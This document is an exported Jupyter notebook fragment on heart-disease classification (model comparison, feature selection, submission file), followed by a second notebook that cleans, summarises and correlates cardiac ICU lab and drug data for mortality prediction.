                                  line = dict(color = 'rgba(50, 171, 96, 1.0)',\
                                              width = 1),),\
                    orientation = 'h')
    layout = go.Layout(title = 'Normalized importance of features',\
                       yaxis = dict(autorange = 'reversed',\
                                    tickangle = 0,\
                                    automargin = True),\
                       width = 800)
    fig = go.Figure(data = [trace0], layout = layout)
    plotly.offline.iplot(fig, filename='norm-importance')
    if threshold:
        # Number of features needed for threshold cumulative importance
        # This is the index (will need to add 1 for the actual number)
        importance_index = np.min(np.where(df['cumulative_importance'] > threshold))
        # Cumulative importance plot
        trace0 = go.Scatter(x = df.index,\
                            y = df['cumulative_importance'],\
                            line = dict(color = 'blue'))
        # Vertical dashed marker at the feature count reaching the threshold.
        trace1 = go.Scatter(x = [importance_index + 1, importance_index + 1],\
                            y = [0, 1.02],\
                            line = dict(color = 'red',\
                                        dash = 'dash'))
        fig1 = go.Figure(data = [trace0, trace1])
        fig1['layout'].update(title = 'Cumulative Feature Importance',\
                              xaxis = dict(title = 'Number of Features'),\
                              yaxis = dict(title = 'Cumulative Importance'),\
                              showlegend = False)
        plotly.offline.iplot(fig1, filename='basic-line')
        print(f'{importance_index + 1} features required for {100 * threshold}% of cumulative importance.')
    return df
# ##### Routine to plot scores of model_results
def plot_scores(model):
    """Bar-plot mean cross-validation F1 per model with std-dev error bars.

    Expects a dataframe with columns 'model', 'cv_mean' and 'cv_std'
    (one row per model).  Renders offline via plotly; returns nothing.
    """
    # model.set_index('model', inplace=True)
    trace0 = go.Bar(
        y=model['cv_mean'],
        x=model['model'],
        marker=dict(
            color='orange',
            line=dict(
                color='black',
                width=1),
        ),
        # Std-dev across folds rendered as error bars.
        error_y=dict(
            type='data',
            array=model['cv_std'],
            visible=True,
            color ='black')
    )
    layout = go.Layout(title='F1 scores of models',
                       width=800, xaxis = dict(tickfont=dict(size=14), automargin=True))
    fig = go.Figure(data=[trace0], layout=layout)
    plotly.offline.iplot(fig, filename='F1-scores')
# ##### Routine to plot f1 and logloss score
def plot_f1_logloss(f1, logloss):
    """Draw one box plot per model for F1 scores and one for log loss.

    Parameters
    ----------
    f1 : DataFrame with columns 'model' and 'cv_scores' (one row per fold).
    logloss : DataFrame with columns 'model' and 'Neglogloss_scores'.

    Both figures are rendered offline with plotly; every fold's point is
    overlaid on its box (boxpoints='all').  Returns nothing.
    """
    # F1 scores: one box per distinct model name.
    trace = []
    for model in f1['model'].unique():
        trace.append(go.Box(y=f1[f1['model'] == model]['cv_scores'],
                            name=model, pointpos=0, boxpoints='all'))
    # Fixed typo in the displayed title ("socres" -> "scores").
    layout = go.Layout(autosize=True, showlegend=False,
                       xaxis=dict(tickfont=dict(size=12)),
                       title="Box plot of F1 scores")
    fig = go.Figure(data=trace, layout=layout)
    plotly.offline.iplot(fig, filename="Box Plot Styling Outliers")
    # Log-loss: same layout, one box per model.
    trace1 = []
    for model1 in logloss['model'].unique():
        trace1.append(go.Box(y=logloss[logloss['model'] == model1]['Neglogloss_scores'],
                             name=model1, pointpos=0, boxpoints='all'))
    layout1 = go.Layout(autosize=True, showlegend=False,
                        xaxis=dict(tickfont=dict(size=12)),
                        title="Box plot of LogLoss")
    fig1 = go.Figure(data=trace1, layout=layout1)
    plotly.offline.iplot(fig1, filename="Box Plot Styling Outliers")
# ## Compare multiple models
# Run several models for classification (without fine tuning) to determine a good baseline model that works for this dataset
model_logloss = pd.DataFrame(columns = ['model','Neglogloss_scores'])
model_results = pd.DataFrame(columns = ['model','cv_scores'])
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegressionCV, RidgeClassifierCV, LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.calibration import CalibratedClassifierCV
# Run SVC
model_results = run_cv_model_f1(SVC(probability=True), train_set, train_labels, 'SVC', model_results)
model_logloss = run_cv_model_logloss(SVC(probability=True), train_set, train_labels, 'SVC', model_logloss)
# Run Random Forest Classifier
model_results = run_cv_model_f1(RandomForestClassifier(n_estimators = 100, random_state = 10, n_jobs = -1), train_set, train_labels, 'RF', model_results)
model_logloss = run_cv_model_logloss(RandomForestClassifier(n_estimators = 100, random_state = 10, n_jobs = -1), train_set, train_labels, 'RF', model_logloss)
# Run LDA
model_results = run_cv_model_f1(LinearDiscriminantAnalysis(), train_set, train_labels, 'LDA', model_results)
model_logloss = run_cv_model_logloss(LinearDiscriminantAnalysis(), train_set, train_labels, 'LDA', model_logloss)
# Run Logistic Regression
model_results = run_cv_model_f1(LogisticRegressionCV(), train_set, train_labels, 'LR', model_results)
model_logloss = run_cv_model_logloss(LogisticRegressionCV(), train_set, train_labels, 'LR', model_logloss)
# Run KNN
kn = [3, 5, 10, 20]
for n in kn:
model_results = run_cv_model_f1(KNeighborsClassifier(n_neighbors=n),
train_set, train_labels, f'KNN-{n}', model_results)
model_logloss = run_cv_model_logloss(KNeighborsClassifier(n_neighbors=n),
train_set, train_labels, f'KNN-{n}', model_logloss)
# +
from xgboost import XGBClassifier
from xgboost import plot_importance
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
model_results = run_cv_model_f1(XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001), train_set, train_labels, 'XGB', model_results)
model_logloss = run_cv_model_logloss(XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001), train_set, train_labels, 'XGB', model_logloss)
# -
# LinearSVC
clf_SVC = CalibratedClassifierCV(LinearSVC(penalty="l1", dual=False))
model_results = run_cv_model_f1(clf_SVC, train_set, train_labels, 'LinearSVC', model_results)
model_logloss = run_cv_model_logloss(clf_SVC, train_set, train_labels, 'LinearSVC', model_logloss)
plot_f1_logloss(model_results,model_logloss)
model_final = model_results.merge(model_logloss, on = 'model')
model_final.groupby('model').mean().sort_values(by = 'Neglogloss_scores')
# ## Feature Engineering
# ##### RFECV feature selection
# +
#from sklearn.feature_selection import RFECV
#features_selection = np.array(train_set.columns)
#estimator = XGBClassifier(colsample_bytree=0.1,n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight = 2, max_depth = 8, gamma=2, subsample=.2,scale_pos_weight = 1, eval_metric='logloss',reg_alpha=0.00001)
#selector = RFECV(estimator, step = 1, cv = strkfold, scoring= scorer, n_jobs = -1)
# +
#selector = selector.fit(train_set, train_labels)
# +
#features_selected = [feat for (i,feat) in enumerate(features_selection) if selector.ranking_[i]==1]
# +
#train_set = train_set[features_selected]
#test_set = test_set[features_selected]
# -
# ##### Preprocessing with pipeline
# +
from sklearn.preprocessing import FunctionTransformer, PolynomialFeatures, Normalizer, StandardScaler
pipeline = Pipeline([('logtransform',FunctionTransformer(np.log1p, validate=True)),\
('polynomialFeatures', PolynomialFeatures(include_bias=True, degree = 2))])
# -
train_set_PF = pipeline.fit_transform(train_set)
test_set_PF = pipeline.fit_transform(test_set)
# ## Validation
# +
from sklearn.metrics import confusion_matrix
import itertools
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='Confusion matrix',
                          cmap=plt.cm.Oranges):
    """
    This function prints and plots the confusion matrix.
    Normalization can be applied by setting `normalize=True`.
    Source: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html

    Args:
        cm: square confusion-matrix array (e.g. from sklearn's
            confusion_matrix), rows = true labels, columns = predicted.
        classes: sequence of class labels used for the axis ticks.
        normalize (bool): if True, each row is scaled to sum to 1 before
            plotting (per-true-class rates instead of raw counts).
        title (str): figure title.
        cmap: matplotlib colormap for the heat map.
    """
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("Normalized confusion matrix")
    else:
        print('Confusion matrix, without normalization')
    plt.figure(figsize = (10, 10))
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title, size = 24)
    plt.colorbar(aspect=4)
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45, size = 14)
    plt.yticks(tick_marks, classes, size = 14)
    # Counts are printed as integers, normalized rates with two decimals.
    fmt = '.2f' if normalize else 'd'
    # Midpoint used to pick white-on-dark vs black-on-light cell text.
    thresh = cm.max() / 2.
    # Labeling the plot
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(j, i, format(cm[i, j], fmt), fontsize = 20,
                 horizontalalignment="center",
                 color="white" if cm[i, j] > thresh else "black")
    plt.grid(None)
    plt.tight_layout()
    plt.ylabel('True label', size = 18)
    plt.xlabel('Predicted label', size = 18)
# -
# split data into train and test sets
X_train, X_valid, y_train, y_valid = train_test_split(train_set_PF, train_labels, test_size=0.2, random_state=10)
# ##### Feature Selection with XGB
# XGBoost model used purely to rank features for SelectFromModel below.
model_selection = XGBClassifier(colsample_bytree=0.1, n_estimators=500, reg_lambda=1, learning_rate=0.08, min_child_weight=2, max_depth=8, gamma=2, subsample=.2, scale_pos_weight=1, eval_metric='logloss', reg_alpha=0.00001)
# shuffle=True is required for random_state to have any effect; modern
# scikit-learn raises a ValueError when random_state is set without it.
kfold = KFold(n_splits=10, shuffle=True, random_state=7)
# select features using threshold
model_selection.fit(X_train, y_train)
selection = SelectFromModel(model_selection, threshold=0.01, prefit=True)
select_X_train = selection.transform(X_train)
# ##### Prediction with LogisticRegression
# train model
model_predict = LogisticRegression()
model_predict.fit(select_X_train, y_train)
# eval model
select_X_valid = selection.transform(X_valid)
y_pred = model_predict.predict(select_X_valid)
y_proba = model_predict.predict_proba(select_X_valid)
# +
#logloss
from sklearn.metrics import accuracy_score, log_loss
#accuracy = accuracy_score(y_valid, y_pred)
#print(accuracy)
#logi = log_loss(y_valid, y_proba)
#print(logi)
# +
valid_preds = model_predict.predict_proba(select_X_valid)
preds_df = pd.DataFrame(valid_preds, columns = targets)
preds_df['prediction'] = preds_df[targets].idxmax(axis = 1)
preds_df['confidence'] = preds_df[targets].max(axis = 1)
# -
print('Accuracy score:', round(accuracy_score(y_valid, preds_df['prediction']), 5))
print('logloss score:', round(log_loss(y_valid, preds_df[[0,1]]), 5))
# ###### plot confussion matrix
cm = confusion_matrix(y_valid, preds_df['prediction'])
plot_confusion_matrix(cm, classes = targets, title = 'heart_disease_present Matrix')
# +
cm_norm = cm.astype('float') / cm.sum(axis = 1)[:, np.newaxis]
for i in range(len(targets)):
for j in range(len(targets)):
if cm_norm[i,j] > 0.1 and i!=j:
print(f'Model predicts heart disease {j} instead of heart disease {i} on {cm[i,j]} ({cm_norm[i,j]:.2}%) examples')
# -
# ## Analysis of best model so far
# #### LR and feature selection
model_final = LogisticRegression()
# select features using threshold
model_selection.fit(train_set_PF, train_labels)
selection = SelectFromModel(model_selection, threshold=0.01, prefit=True)
select_train_set = selection.transform(train_set_PF)
model_final.fit(select_train_set, train_labels)
# +
predictions = pd.DataFrame()
select_test_set = selection.transform(test_set_PF)
# Make predictions from the fold as probabilities
probabilites = model_final.predict_proba(select_test_set)
# Record each prediction for each class as a separate column
for j in range(len(targets)):
predictions[j] = probabilites[:,j]
# Add needed information for predictions
predictions['patient_id'] = test_ids
# Find the class and associated probability
predictions['heart_disease_present'] = predictions[targets].idxmax(axis = 1)
predictions['confidence'] = predictions[targets].max(axis = 1)
# -
predictions.head()
# ##### Investigate distribution of labels in train and test
# +
trace0 = go.Bar(x = targets, y = df_final['heart_disease_present'].value_counts()/num_train, name = 'train',
marker=dict(
color='orange',
line=dict(
color='black',
width=1),
))
trace1 = go.Bar(x = targets, y = predictions['heart_disease_present'].value_counts()/num_test, name = 'predicted',
marker=dict(
color='blue',
line=dict(
color='black',
width=1),
))
layout = go.Layout(title='Label distribution in train and test (predicted)',
width=800, xaxis = dict(tickfont=dict(size=14), automargin=True),
yaxis = dict(title='Frequencies'))
fig = go.Figure(data=[trace0, trace1], layout=layout)
plotly.offline.iplot(fig, filename='label-dist')
# -
# ##### Submission
submission = submission_base.merge(predictions, on = 'patient_id', how = 'left')
submission = submission.drop(columns =[0,'heart_disease_present','confidence'])
submission = submission.rename(columns = {1:'heart_disease_present'})
submission.head()
submission.to_csv('Arnau_submission.csv',index=False)
| 26,713 |
/Chapter3.ipynb
|
ba1ca11447129c2666f4570022a48086890bb193
|
[] |
no_license
|
munglin/Explainability_and_Actionability
|
https://github.com/munglin/Explainability_and_Actionability
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,134,723 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Code for Chapter 3
# ### 1. Setting Up
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
from pandas.core.common import SettingWithCopyWarning
warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)
# -
df = pd.read_csv('cardiac_complete_v1.csv')
labels = df.columns.values
# ### Chapter 3.1 Feature Treatments
# Separate Variables
# #### Take in a set of labels, and return five lists: (1) Demographic Variables, (2) Lab Measurement Variables, (3) Interventions - Procedures, (4) Interventions - Drug, (5) Target.
# +
def get_features(labels,check=False):
    """Partition the dataset's column labels into five feature categories.

    Args:
        labels: array-like of column names in the dataset's column order.
        check (bool): forwarded to check_features; when True the names in
            each category are printed in addition to the counts.

    Returns:
        Tuple of five arrays: (demographic, lab-test, procedure, drug,
        target) column labels.
    """
    labels_dem = []; labels_lab = []; labels_proc = [];
    labels_drug = []; labels_tar = [];
    # Known columns picked out by name when present.
    if 'expire_flag' in labels:
        labels_tar.append('expire_flag')
    if 'age' in labels:
        labels_dem.append('age')
    if 'gender' in labels:
        labels_dem.append('gender')
    # Edit this section according to the dataset
    # NOTE(review): these positional slices assume the cardiac_complete_v1.csv
    # column layout (labs at 5:74, procedures at 74:88, drugs at 88:) --
    # verify them if the input file changes.
    labels_lab = labels[5:74]
    labels_proc = labels[74:88]
    labels_drug = labels[88:]
    labels_dem = np.array(labels_dem,dtype=object)
    labels_tar = np.array(labels_tar,dtype=object)
    # Print a per-category summary (and optionally the names themselves).
    check_features(labels_dem,'Demographic',check)
    check_features(labels_lab,'Laboratory Tests',check)
    check_features(labels_proc,'Procedures',check)
    check_features(labels_drug,'Drug Interventions',check)
    check_features(labels_tar,'Target Value',check)
    return labels_dem,labels_lab,labels_proc,labels_drug,labels_tar
def check_features(labels, type, check=False):
    """Print how many features fall in the given category.

    When *check* is truthy, the feature names are also printed on one
    line, separated by commas.
    """
    print(f"Total {type} Features: {len(labels)}")
    if check:
        print(", ".join(str(label) for label in labels))
# -
labels_dem,labels_lab,labels_proc,labels_drug,labels_tar = get_features(labels,False)
# Clean Data
def clean_dataframe(data):
    """Return a copy of *data* with all values coerced to floats.

    Free-text lab/drug entries (threshold strings such as '>150', ranges
    such as '100-250', spreadsheet-mangled dates such as '3-May', error
    annotations, and categorical words) are mapped to numeric codes or
    midpoints; unparseable placeholders become NaN.  check_unclean is
    called before the final cast so any value still non-numeric is
    reported.  The order of the replace chains matters -- later, broader
    replacements rely on earlier, column-specific ones having run first.
    """
    data = data.copy()
    labels_df = data.columns.values
    # Cleaning
    # Threshold strings ('>x', '<x') become just-beyond-threshold numbers.
    data = data.replace(['>20.2'], 20.3).replace(['GREATER THAN 10'], 10.1).replace(['>150'], 151).replace(['>1000'], 1001)
    # Ranges (and Excel-mangled dates like '3-May') become representative values.
    data = data.replace('0-2',1).replace(['<1','<1.0'],0).replace('3-May',4).replace('6-Oct',8).replace('Nov-20',15).replace('21-50',35).replace('>50',51)
    # Placeholder tokens become missing values.
    data = data.replace(['.',' ', 'NotDone','NOTDONE'],np.nan)
    data = data.replace('>80',81).replace('>300',301).replace('>500',501).replace('<35',34).replace('<1 /HPF',0).replace('>8',9)
    data['gender'] = data['gender'].replace('M',0).replace('F',1)
    data = data.replace(['NEGATIVE NO EOS SEEN', 'POSITIVE RARE EOS'],0)
    # Lab error annotations carry a corrected value -- recover it.
    data = data.replace('ERROR PREVIOUSLY REPORTED AS 9.4',9.4).replace('ERROR PREVIOUSLY REPORTED AS 32.6',32.6).replace('GREATER THAN 30',30).replace('ERROR PREVIOUSLY REPORTED AS 100',100).replace('150 IS HIGHEST MEASURED PTT',150).replace('ERROR PREVIOUSLY REPORTED AS 313',313).replace('ERROR PREVIOUSLY REPORTED AS 14.8',14.8).replace('ERROR PREVIOUSLY REPORTED AS 2.90',2.90).replace('ERROR PREVIOUSLY REPORTED AS 10.1',10.1)
    # Dose/measurement ranges collapsed to their midpoints.
    data = data.replace('100-250',175).replace('1-2',1.5).replace('2-4',3).replace('25-100',62.5).replace('25-50',37.5).replace('100-200',150).replace('50-200',125).replace('100-500',300).replace('75-100',87.5).replace('12.5-25',18).replace('50-100',75).replace('100-400',250)
    data = data.replace('1000-2000',1500).replace('2200-4300',3250).replace('1500-2900',2200).replace('1500-3000',2250).replace('400-900',650).replace('1400-2800',2100).replace('1700-3500',2600).replace('1900-3800',2850)
    # Ordinal encoding for specific-gravity threshold categories.
    data['Specific Gravity'] = data['Specific Gravity'].replace('<1.005',0).replace('<=1.005',2).replace('>=1.030',3).replace('>1.030',4).replace('>=1.035',5).replace('>1.035',6).replace('>1.050',7).replace('>1.080',8)
    data['Acetaminophen'] = data['Acetaminophen'].replace('325-650', 500).replace('500-1000',750)
    data = data.replace('15-30',22.5).replace('30-60',45).replace('30-45',37.5)
    data = data.replace('0.5-2',1.25).replace('0.5-1',0.75).replace('1-5',3).replace('2-8',5).replace('0.25-2',1.125).replace('0.25-0.5',0.375)
    data = data.replace('2-4',3).replace('1-2',1.5).replace('2-6',4).replace('0.5-4',2.25).replace('2-5',3.5).replace('1-4',2.5)
    data = data.replace('0.5-4.0',2.25).replace('1-8',4.5)
    data = data.replace('200-400',300).replace('400-600',500).replace('15-30',22.5).replace('20-40',30).replace('40-60',50).replace('4-8',6)
    data = data.replace('1-6',3.5).replace('2-10',6).replace('1-3',2).replace('1-10',5.5).replace('4-6',5)
    # Manual recoding of a few Potassium Chloride doses.
    data['Potassium Chloride'][data['Potassium Chloride'] == 9 ] = 10
    data['Potassium Chloride'][data['Potassium Chloride'] == 2.5 ] = 0
    data['Potassium Chloride'][data['Potassium Chloride'] == 12 ] = 10
    # New additions
    # Ordinal encodings for categorical lab results.
    data['Bacteria'] = data['Bacteria'].replace(['NONE','O'],0).replace('RARE',1).replace('OCC',3).replace('FEW',2).replace('MOD',4).replace('MANY',5)
    data['Bilirubin'] = data['Bilirubin'].replace('SM',0).replace('MOD',1).replace('LG',2)
    data['Blood'] = data['Blood'].replace('SM',0).replace('MOD',1).replace(['LGE','LG'],2)
    data['Creatine Kinase, MB Isoenzyme'] = data['Creatine Kinase, MB Isoenzyme'].replace('GREATER THAN 500',501)
    data['Eosinophils'] = data['Eosinophils'].replace(['POSITIVE MODERATE EOS'],0)
    data['Intubated'] = data['Intubated'].replace('INTUBATED',1).replace('NOT INTUBATED',0)
    data['Leukocytes'] = data['Leukocytes'].replace('SM',0).replace('MOD',1).replace('LG',2)
    data['Nitrite'] = data['Nitrite'].replace('POS',1)
    data['SPECIMEN TYPE'] = data['SPECIMEN TYPE'].replace('ART',0).replace('VEN',1).replace('MIX',2).replace('CENTRAL VENOUS',3)
    data['Troponin T'] = data['Troponin T'].replace(['LESS THAN 0.01','<0.01'],0.01).replace('<0.02',0.02).replace('<0.10',0.10)
    data['Ventilator'] = data['Ventilator'].replace('CONTROLLED',1).replace('SPONTANEOUS',3).replace('IMV',2)
    data['Yeast'] = data['Yeast'].replace('NONE',0).replace('FEW',2).replace('RARE',1).replace('OCC',3).replace('MOD',4).replace('MANY',5)
    data = data.replace(['1-Feb', '2-Apr'],0.5)
    data['Insulin'] = data['Insulin'].replace('Feb-16',0.125).replace(['16; give 1/2 dose when NPO'],16)
    data['Meperidine'] = data['Meperidine'].replace('112.5-25',18).replace('25-30',27.5)
    data['Metoprolol'] = data['Metoprolol'].replace(['Oct-20', '5-Oct'],0.5).replace('May-20',0.25)
    data['Nitroglycerin'] = data['Nitroglycerin'].replace('0.25-0.6',0.5).replace('20-200',100).replace('0-10',5)
    data['Ondansetron'] = data['Ondansetron'].replace('4-Aug',0.5).replace('2-Aug',0.25)
    data['Urine Appearance'] = data['Urine Appearance'].replace(['Clear', 'CLEAR'],0).replace(['CLO','Cloudy','CLOUDY'],1).replace(['SlCloudy','SlCldy'],2).replace(['HAZY','Hazy'],3).replace(['SlHazy','SLHAZY'],4).replace('TURBID',5).replace('CLO',2)
    data['Urine Color'] = data['Urine Color'].replace(['Yellow', 'YELLOW'],1).replace(['Amber','LtAmb','DkAmb','AMBER','AMB','DKAMBE','DKAMBER'],2).replace(['PINK', 'Red','RED',],3).replace(['Straw','STRAW','Other', 'None'],0).replace(['Orange','ORANGE'],4).replace(['Brown','B'],6).replace('Green',5)
    # Anything still known-unparseable becomes NaN before the final cast.
    data = data.replace(['ERROR', 'COMPUTER NETWORK FAILURE. TEST NOT RESULTED.','NEG','nan','CHRISTA1','TR'], np.nan)
    # Report any remaining non-numeric values before casting.
    check_unclean(data)
    data_cleaned = data.astype(float)
    return data_cleaned
# #### Function checks if the dataset is cleaned - contains only numerical values.
# Input: Dataframe; Output: Features which have non-numerical values
def check_unclean(data):
    """Report columns of *data* that still contain non-numeric values.

    For every column, each entry is tentatively converted with ``float``;
    entries that fail are collected (deduplicated, in first-appearance
    order) and printed together with the column name.  Fully numeric
    columns produce no output.

    Parameters
    ----------
    data : pandas.DataFrame
        The frame to inspect.
    """
    for column in data.columns.values:
        non_numeric = []
        for value in data[column]:
            try:
                float(value)
            except (TypeError, ValueError):
                # float() raises ValueError for unparseable strings and
                # TypeError for e.g. None; a bare except here would also
                # swallow KeyboardInterrupt/SystemExit, so keep it narrow.
                if value not in non_numeric:
                    non_numeric.append(value)
        if len(non_numeric) > 0:
            print(column, non_numeric)
# Run the full cleaning pipeline defined above on the raw frame.
data = clean_dataframe(df)
# ### Chapter 4 Features
# #### Choose which set of features to be used
# Selecting only Demographic + Lab Test Features
features_lab_raw = np.concatenate((labels_dem,labels_lab))
# Selecting Demographic + Lab Test + Interventional Features
# features_int_raw = np.concatenate((labels_dem,labels_lab,labels_proc,labels_drug))
# Bare expression: in a notebook this just displays the target label list.
labels_tar
# Select the features which are being used
X_raw = data[features_lab_raw]
Y = data[labels_tar]
# Percentage of missing entries per feature (shape[0]/100 converts counts to %).
missing_percentage = (X_raw.isna().sum(axis=0)/(X_raw.shape[0]/100)).values
features_lab = features_lab_raw.copy().tolist()
# Report and drop features that are more than 50% missing.
for i in range(len(missing_percentage)):
    if missing_percentage[i] > 50:
        print(features_lab_raw[i], missing_percentage[i])
        features_lab.remove(features_lab_raw[i])
# #### Select features - (A) only demographic and lab test features or (B) demographic, lab test, procedures and drug features
## Select feature list
option_features = 'intervention'
features_chosen = features_lab
# Select either (A) only lab test + demographic variables, or (B) lab test + interventional features
if option_features == 'intervention':
    features_chosen = np.concatenate((features_lab,labels_proc,labels_drug))
X = data[features_chosen]
if option_features == 'intervention':
    # X[labels_proc] = X[labels_proc].applymap(lambda x: 0 if np.isnan(x) else x)
    # X[labels_drug] = X[labels_drug].applymap(lambda x: 0 if np.isnan(x) else 1)
    # Missing procedure values become 0; drug columns are binarised to given/not-given.
    # NOTE(review): assigning into a slice of `data` may raise
    # SettingWithCopyWarning — confirm X is an independent copy if that matters.
    X[labels_proc] = X[labels_proc].applymap(lambda x: 0 if np.isnan(x) else x)
    X[labels_drug] = X[labels_drug].applymap(lambda x: 0 if np.isnan(x) else 1)
# ### 5. Get information about the dataset
# #### A) Develop the mean and standard deviations
import statistics
from statistics import stdev
def checkbinary(row):
    """Return True when the non-NaN entries of *row* are all 0/1 valued."""
    values = row.dropna()
    return np.array_equal(values, values.astype(bool))


def get_distribution(X, Y):
    """Summarise per-feature percentiles of *X*, overall and per outcome class.

    Row layout of the result (one column per feature of *X*):
      rows 0-4   : 2.275 / 15.865 / 50 / 84.135 / 97.725 percentiles, all rows
      rows 5-9   : same percentiles over rows with ``expire_flag == 0``
      rows 10-14 : same percentiles over rows with ``expire_flag == 1``
      row  15    : 1.0 when the feature's observed values are binary, else 0.0

    Parameters
    ----------
    X : pandas.DataFrame
        Numeric feature matrix; may contain NaN.
    Y : pandas.DataFrame
        Must contain an ``expire_flag`` column of 0/1 outcomes.

    Returns
    -------
    pandas.DataFrame of shape (16, X.shape[1])
    """
    # 2-sigma / 1-sigma normal tail probabilities plus the median.
    percentiles = (2.275, 15.865, 50.000, 84.135, 97.725)
    df_dist = pd.DataFrame(np.zeros((16, X.shape[1])), columns=X.columns.values)
    # All patients, then survivors, then deceased — 5 percentile rows each.
    subsets = (X, X.loc[Y['expire_flag'] == 0], X.loc[Y['expire_flag'] == 1])
    for block_idx, subset in enumerate(subsets):
        for offset, q in enumerate(percentiles):
            df_dist.iloc[5 * block_idx + offset, :] = np.nanpercentile(subset, q, axis=0)
    df_dist.iloc[15, :] = X.apply(checkbinary, axis=0)
    return df_dist
# 16-row percentile / binary-flag summary for every feature (see get_distribution).
data_percentiles = get_distribution(X,Y)
# Notebook display of the summary table.
data_percentiles
# #### A) Visualise the features for each class
# +
import seaborn as sns
import matplotlib.pyplot as plt
def plot_distribution(feature, X, Y, bins=30):
    """Overlay histograms of *feature* for the two outcome classes.

    Parameters
    ----------
    feature : str
        Column of *X* to plot.
    X, Y : pandas.DataFrame
        *Y* must contain an ``expire_flag`` column of 0/1 outcomes.
    bins : int
        Number of histogram bins (default 30).
    """
    X_0 = (X[Y['expire_flag'] == 0][feature])
    X_1 = (X[Y['expire_flag'] == 1][feature])
    plt.hist([X_0, X_1], bins, density=False)
    plt.legend(['Class 0', 'Class 1'])
    plt.xlabel('Distribution of ' + feature + ' for both classes')
    plt.ylabel('Number of Patients')
    # Fixed typo in the original title text ("distriubtion" -> "distribution").
    plt.title('Histogram displaying the distribution of ' + feature + ' for both Classes')
    plt.show()
# -
# Example: class-split histogram of the 81st chosen feature.
plot_distribution(features_chosen[80],X,Y,bins=15)
# #### B) Correlation between features and target class
# #### Firstly, measure the correlation between each feature and the target class
from scipy import stats
def return_correlation(feature, X, Y, corr='p'):
    """Correlation between one feature column and the ``expire_flag`` target.

    Fixes over the original: the Spearman and Kendall branches previously
    hard-coded ``X['age']`` instead of the requested *feature*, the Kendall
    branch referenced ``scipy.stats`` (only ``stats`` is imported here), and a
    dead leading ``pearsonr`` call whose result was discarded has been removed.

    Parameters
    ----------
    feature : str
        Column of *X* to correlate.
    X, Y : pandas.DataFrame
        *Y* must contain an ``expire_flag`` column.
    corr : str
        's' for Spearman, 'k' for Kendall, anything else for Pearson (default).

    Returns
    -------
    tuple of (correlation, p-value)
    """
    target = Y['expire_flag']
    if corr == 's':
        print('S')
        # nan_policy='omit' drops pairs where the feature value is missing.
        return tuple(stats.spearmanr(X[feature], target, nan_policy='omit'))
    elif corr == 'k':
        print('K')
        # Mask NaNs explicitly; older SciPy kendalltau lacks nan_policy.
        nan_flag = np.isnan(X[feature])
        return tuple(stats.kendalltau(X[feature][~nan_flag], target[~nan_flag]))
    else:
        nan_flag = np.isnan(X[feature])
        return stats.pearsonr(X[feature][~nan_flag], target[~nan_flag])
# #### Secondly, identify the mutual information between each feature and the output
# +
from sklearn.metrics import mutual_info_score
# Mutual information between each feature (non-missing rows only) and the target.
stats_MI = np.zeros(len(features_chosen),)
for i in range(len(features_chosen)):
    stats_MI[i] = mutual_info_score(X[features_chosen[i]][~np.isnan(X[features_chosen[i]])].values.ravel(),Y[~np.isnan(X[features_chosen[i]])].values.ravel())
# Report features ranked by |MI|, strongest first.
for i in np.argsort(np.abs(stats_MI))[::-1]:
    print(features_chosen[i] + ', Correlation ' + "{:.4f}".format(stats_MI[i]))
# #### Lastly, identify the correlation between a positive class and a particular feature
# +
# Per feature, count patients in each (class, below/above-median) quadrant:
#   col 0: class 0 & value <= median    col 1: class 0 & value > median
#   col 2: class 1 & value <= median    col 3: class 1 & value > median
stats_percentage = np.zeros((len(features_chosen),4))
for i in range(len(features_chosen)):
    FT = features_chosen[i]
    # Restrict both feature and target to rows where the feature is observed.
    X_temp = X[FT][~np.isnan(X[FT])]
    Y_temp = Y['expire_flag'][~np.isnan(X[FT])]
    X_temp_median = np.median(X[FT][~np.isnan(X[FT])])
    for j in range(len(X_temp)):
        if Y_temp.iloc[j] == 0:
            if (X_temp.iloc[j] <= X_temp_median):
                # Class 0, Value of feature is small
                stats_percentage[i,0] += 1
            else:
                # Class 0, value of feature is large
                stats_percentage[i,1] += 1
        else:
            if (X_temp.iloc[j] <= X_temp_median):
                # Class 1, value of feature is small
                stats_percentage[i,2] += 1
            else:
                # Class 1, value of feature is large
                stats_percentage[i,3] += 1
# -
# Among above-median patients, report the share that died, ranked descending.
for i in np.argsort(stats_percentage[:,3]*100/(stats_percentage[:,3] + stats_percentage[:,1]))[::-1]:
    if features_chosen[i] in features_lab:
        print("[DEM/LAB] " + features_chosen[i] + ": " + str(int(np.sum(stats_percentage[i,:]) )) + ". Positive Correlation Rate: {:.2f}".format(stats_percentage[i,3]*100/(stats_percentage[i,3] + stats_percentage[i,1])) + "%")
    else:
        print("[DRUG/INT] " + features_chosen[i] + ": " + str(int(np.sum(stats_percentage[i,:]) )) + ". Positive Correlation Rate: {:.2f}".format(stats_percentage[i,3]*100/(stats_percentage[i,3] + stats_percentage[i,1])) + "%")
# #### C) Correlation between each feature
# #### Finally, develop a correlation matrix, depicting the correlation between features.
